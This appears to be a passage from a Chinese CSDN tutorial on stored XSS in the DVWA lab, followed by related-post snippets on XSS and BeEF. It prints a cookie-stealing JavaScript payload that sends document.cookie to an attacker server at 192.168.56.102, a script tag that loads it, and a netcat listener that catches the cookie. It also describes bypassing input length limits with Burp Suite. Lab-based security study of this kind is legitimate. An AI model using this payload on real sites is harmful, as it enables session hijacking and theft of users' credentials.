kali渗透学习-Web渗透XSS(三)存储型XSS、DOM型XSS、神器BEFF

最新推荐文章于 2024-04-23 09:59:06 发布
最新推荐文章于 2024-04-23 09:59:06 发布
阅读量246 收藏
点赞数
分类专栏: xss和csrf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43239236/article/details/107477037
版权

存储型XSS

1、可长期存储于服务器端

2、每次用户访问都会被执行js脚本,攻击者只需侦听指定端口

#攻击利用方法大体等于反射型xss利用

##多出现在留言板等位置

*推荐使用burpsuite
a、观察返回结果,是否原封不动地返回输入数据?是否有其他标签
在这里插入图片描述
js代码通过留言板存储在服务器中,所以每次点击留言板链接,都会弹出xss弹窗
在这里插入图片描述
注入后会永久在服务器端,每次访问都会下发该注入。
用dvwa测试的时候消除注入需在设置中重置数据库

b、测试加载攻击者控制的服务器中的js文件

#启动apache2【默认侦听80端口】
在这里插入图片描述
a.js 【盗取客户端cookie信息,并把它上传到攻击者控制的服务器的PHP文件】

var img = new Image();
img.src = "http://192.168.56.102:88/cookies.php?
cookie="+document.cookie;

***默认在客户端进行长度的限制,可用burpsuite进行绕过或直接修改HTML代码中的长度限制  【安全性好的,同时在客户端跟服务器端进行长度限制】
在这里插入图片描述

<script src="http://192.168.56.102/a.js"></script>

使用nc演示效果,侦听88端口,提交成功/刷新页面,即可成功获得cookie
在这里插入图片描述
代码审计  【以下代码只是对输入数据进行过滤】

<?php

if(isset($_POST['btnSign']))
{
   

   $message = trim($_POST['mtxMessage']);
   $name
最低0.47元/天 解锁文章
唐吉可黄
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DVWA的Xss跨站脚本攻击(存储
AZK707的博客
03-17 1549
目录 存储 一、初级 1)在name框里注入 2)在message框里注入(输入的内容不一致,保持区分) 3)burpsuite抓包修改(输入的内容不一致,保持区分) (抓包是另一种方法,所有的xss都可以用这个方式) 二、中级 1)大写绕过 2)双写绕过ipt>alert(/50zky_mtest_01_2/) 三、高级 换成别发标签,例如图片标签 四、impossible级别 存储 一、初级 1.发现正常输入name时,有长度限...
DVWA系列(三)——使用Burpsuite进行反射XSS(反射跨站脚本攻击)
橘子女侠
05-05 3812
1. XSS简介 (1)XSS(cross-site scripting) 跨站脚本攻击,通过web站点漏洞,向客户端交付恶意脚本代码,这些代码可以被浏览成功的执行,从而实现对客户端的攻击; XSS可以盗取客户端cookie,将客户端重定向到第三方网站; (2)客户端脚本语言 弹窗警告、广告; JavaScript; 在浏览中执行; (3)JavaScript 与J...
【Burpsuite靶场】XSS
最新发布
2302_79800344的博客
04-23 1183
基于Burpsuite靶场,深度学习XSS三种类的各类情况。
burpsuite检测xss漏洞
夜车星繁的博客
07-17 7597
burpsuite检测xss漏洞 XSS(跨站脚本攻击)漏洞是Web应用程序中最常见的漏洞之一,它指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意攻击用户的特殊目的,比如获取用户的cookie,导航到恶意网站,携带木马等。根据其触发方式的不同,通常分为反射XSS存储XSSDOM-baseXSS。漏洞“注...
XSS漏洞:利用多次提交技巧实现存储XSS攻击
qq_68163788的博客
01-21 2291
存储XSS(Cross-Site Scripting)是一种Web应用程序安全漏洞,攻击者通过在受害者的浏览上执行恶意脚本,从而获取用户的敏感信息。存储XSS攻击的主要原理是将恶意脚本存储在服务端,然后当用户访问包含该恶意脚本的页面时,恶意脚本会被执行。 攻击者通常会在受害者能够输入内容的地方(例如论坛、博客评论、搜索框等)注入恶意脚本。当其他用户访问包含恶意脚本的页面时,他们的浏览会执行这些脚本,从而导致攻击者能够窃取用户的会话令牌、cookie或其他敏感信息。
Web安全测试之XSS
weixin_43090420的博客
06-16 494
XSS全称(Cross Site Scripting)跨站脚本攻击,是Web程序中最常见的漏洞,指攻击者在网页中嵌入客户端脚本(例如JavaScript),当用户浏览此网页时,脚本就会在用户的浏览上执行,从而达到攻击者的目的,比如获取用户的Cookie,导航到恶意网站,携带木马等。 作为测试人员,需要了解XSS的原理,攻击场景,如何修复,才能有效的防止XSS的发生。 阅读目录 XSS是如何发生...
kali-linux-2021.3-installer-amd64.part4.rar
09-29
kali-linux-2021.3-installer-amd64.iso适用于X64位系统,文件分割成 5个 压缩包,必须集齐5个 文件后才能一起解压一起使用: kali-linux-2021.3-installer-amd64.part5.rar ... kali-linux-2021.3-installer-amd64....
kali-linux-web-pentest-cookbook
11-21
Kali Linux Web Penetration Testing Cookbook》是一本专注于利用Kali Linux进行Web应用渗透测试的专业技术书籍。Kali Linux,前身为BackTrack,是全球安全研究人员广泛使用的开源操作系统,特别设计用于网络安全...
教主Kali与Python黑客.6.WEB攻击.3.XSS
10-14
教主Kali与Python黑客.6.WEB攻击.3.XSS
一起打靶-Breach-2-final2.1.xss上线
09-28
"一起打靶-Breach-2-final2.1.xss上线" 知识点1:靶机配置 靶机 Breach 2.0 配置了静态 IP(192.168.110.151),用户需要配置主机 only 适配来访问该子网。 知识点2:生产环境模拟 该挑战试图展示一个真实世界的...
Kali安全渗透高级工程师-2019年-学习必备软件包汇总
11-10
Kali Linux预装了许多渗透测试软件,包括nmap 、Wireshark 、John the Ripper,以及Aircrack-ng.[2] 用户可通过硬盘、live CD或live USB运行Kali Linux。Kali Linux既有32位和64位的镜像。可用于x86 指令集。同时...
burp靶场--xss上篇【1-15】
qq_33168924的博客
01-29 1353
跨站脚本 (XSS) 是一种通常出现在 Web 应用程序中的计算机安全漏洞。XSS 允许攻击者将恶意代码注入网站,然后在访问该网站的任何人的浏览中执行该代码。这可能允许攻击者窃取敏感信息,例如用户登录凭据,或执行其他恶意操作。XSS 攻击主要有 3 种类:反射 XSS:在反射 XSS 攻击中,恶意代码嵌入到发送给受害者的链接中。当受害者点击链接时,代码就会在他们的浏览中执行。例如,攻击者可以创建包含恶意 JavaScript 的链接,并将其通过电子邮件发送给受害者。
2020-11-22
qq_51370368的博客
11-24 361
实验三 XSS和SQL注入 实验目的:了解什么是XSS;了解XSS攻击实施,理解防御XSS攻击的方法;了解SQL注入的基本原理;掌握PHP脚本访问MySQL数据库的基本方法;掌握程序设计中避免出现SQL注入漏洞的基本方法;掌握网站配置。 系统环境:Kali Linux 2、Windows Server 网络环境:交换网络结构 实验工具: Beef;AWVS(Acunetix Web Vulnarability Scanner);SqlMAP;DVWA 实验步骤: XSS部分:利用Beef劫持被攻击者客户
kali渗透测试与教学笔记4:XSS
lm19770429的专栏
04-21 287
靶机应用地址:http://10.10.10.129/mutillidae/index.php 想成功执行一个XSS有2步:攻击者数据没有被过滤掉、web应用返回的数据没有经过编码 因此一个安全的web应用要对特殊字符进行编码,最好是进行十六进制编码。 OWASP给出了防止XSS指南。国外网站不好访问,这里提供CSDN的两个地址: https://blog.csdn.net/aerchi/...
网络渗透测试实验三 XSS和SQL注入
weixin_62571616的博客
11-26 763
XSS和SQL注入
Kali beef-xss实现Xss详细教程。
sunwanfulove的博客
09-28 3417
Kali beef-xss实现Xss详细教程。
手把手教学安全渗透测试从基础到实践
12-30
本课程基于Kali linux教学安全渗透测试,模拟黑客进行攻击测试。
2021Kali系列 -- XSS漏洞(Beef-xss
weixin_41489908的博客
04-14 1917
​当我不欠任何人的时候,我就只欠我自己了。。。 ----网易云热评 一、安装beef-xss 输入beef-xss,提示安装,输入y 二、启动beef-xss 三、访问登陆页面: http://192.168.139.133:3000/ui/panel 四、让目标主机访问存在生成的钩子代码 http://192.168.139.129:81/dvwa/vulnerabilities/xss_r/?name=<script src="http://192.168.139.1.
Kali渗透全方位实战】利用Beef进行XSS会话劫持(XSS Stored)
李响
03-21 1876
文章目录1 会话劫持2 kali中beef的使用3 开始渗透2.1 修改dvwa xss stored等级为low2.2 script 标签2.3 过程演示2.4 会话劫持2.5 换一台虚拟机测试 1 会话劫持 例如你Telnet到某台主机,这就是一次Telnet会话;你浏览某个网站,这就是一次HTTP会话。而会话劫持(Session Hijack),就是结合了嗅探以及欺骗技术在内的攻击手段。例如...
web安全之kali-xss-beef剑心哥哥
12-24
Kali Linux是一种用于网络安全测试和渗透测试的操作系统,它具有强大的工具和功能,可以用于检测和解决网站的安全漏洞。XSS(跨站脚本攻击)是一种常见的网络安全漏洞,可以通过在网页中插入恶意脚本来获取用户的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值